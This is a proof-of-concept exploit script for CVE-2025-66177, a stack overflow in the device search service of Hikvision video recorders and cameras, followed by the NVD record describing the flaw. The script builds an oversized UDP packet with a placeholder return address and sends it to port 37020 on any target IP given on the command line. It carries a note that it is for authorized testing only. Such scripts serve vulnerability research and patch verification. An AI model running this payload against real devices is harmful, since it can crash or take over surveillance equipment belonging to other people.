CVE-2025-66177

#!/usr/bin/env python3 """ CVE-2025-66177 PoC - Hikvision Device Search Stack Overflow Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import sys def create_exploit_packet(): """Construct malicious device search response packet""" # Device Search Protocol header header = b'\x00\x00\x00\x00' # Protocol version packet_type = b'\x01\x00' # Response packet type # Overflow payload - trigger stack overflow # Sending oversized device info field overflow_length = 2000 # Exceed buffer size overflow_payload = b'A' * overflow_length # Malicious return address (to be customized based on target) return_addr = struct.pack('<I', 0x41414141) # Placeholder address # Construct packet with overflow data packet = header + packet_type packet += struct.pack('<H', overflow_length) # Length field packet += overflow_payload + return_addr return packet def send_exploit(target_ip, target_port=37020): """Send exploit packet to target device""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) exploit_packet = create_exploit_packet() try: print(f"[*] Sending exploit to {target_ip}:{target_port}") sock.sendto(exploit_packet, (target_ip, target_port)) print(f"[+] Exploit packet sent ({len(exploit_packet)} bytes)") print("[!] If vulnerable, device may crash or allow code execution") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) send_exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-66177", "sourceIdentifier": "[email protected]", "published": "2026-01-13T03:16:01.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision NVR/DVR/CVR/IPC models. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device."}, {"lang": "es", "value": "Hay una vulnerabilidad de desbordamiento de pila en la función de Búsqueda y Descubrimiento de dispositivos de los modelos Hikvision NVR/DVR/CVR/IPC. Si se explota, un atacante en la misma red de área local (LAN) podría causar que el dispositivo funcione mal enviando paquetes especialmente diseñados a un dispositivo sin parchear."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/buffer-overflow-vulnerabilities-in-some-hikvision-products/", "source": "[email protected]"}]}}